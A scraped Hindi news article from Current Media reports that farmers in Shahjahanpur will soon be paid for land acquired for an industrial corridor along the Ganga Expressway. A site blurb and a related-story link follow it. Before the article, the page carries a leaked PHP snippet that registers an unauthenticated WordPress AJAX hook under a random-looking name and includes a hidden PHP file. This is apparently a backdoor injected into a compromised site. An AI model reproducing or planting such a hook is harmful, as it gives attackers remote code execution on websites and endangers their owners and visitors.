if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }गंगा एक्सप्रेसवे के किनारे औद्योगिक गलियारे के लिए भूमि अधिग्रहण का पैसा जल्द मिलेगा किसानों को - Current Media

गंगा एक्सप्रेसवे के किनारे औद्योगिक गलियारे के लिए भूमि अधिग्रहण का पैसा जल्द मिलेगा किसानों को

शाहजहांपुर/जलालाबाद । मो0 आफाक। शाहजहॉपुर क्षेत्र में गंगा एक्सप्रेसवे के किनारे 102 हेक्टर में औद्योगिक गलियारा बनाया जाएगा। इसकी जानकारी देते हुए संदीप कुमार ने बताया औद्योगिक गलियारे के लिए कुल 850 किसानो की जमीन बैनामा कराने के लिए चिह्नित की गई थी। अभी 153 किसानों के बैनामा होना बाकी है । जबकि अधिकतर जमीन के बैनामा की प्रक्रिया पूरी हो चुकी है। केवल 8 हेक्टेयर भूमि का बैनामा होना बाकी है। जल्दी ही किसानों को भुगतान उनके खाते में भेजा जाएगा इसके लिए सिटी मजिस्ट्रेट परविंद कुमार जलालाबाद पहुंचे जहां उन्होंने उप जिलाधिकारी दुर्गेश यादव के साथ फाइलों की समीक्षा की और भुगतान की पत्रावलियों को जिला प्रशासन को प्रेषित करने के निर्देश दिए। ताकि औद्योगिक गलियारे में जिन किसानों की जमीन अधिग्रहित की गई है उनके पेमेंट की प्रक्रिया पूरी की जा सके। आपको बताते चलें औद्योगिक गलियारे में तमाम फैक्ट्रियां खोली जाएगी इसके लिए सरकार युद्ध स्तर से काम कर रही है।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

शांतिपूर्ण माहौल में अदा हुई ईद-उल-अज़हा की नमाज

शाहजहांपुर। मो0आफाक । शाहजहांपुर में ईद-उल-अजहा का त्योहार गुरुवार को शांतिपूर्ण और सौहार्दपूर्ण माहौल में …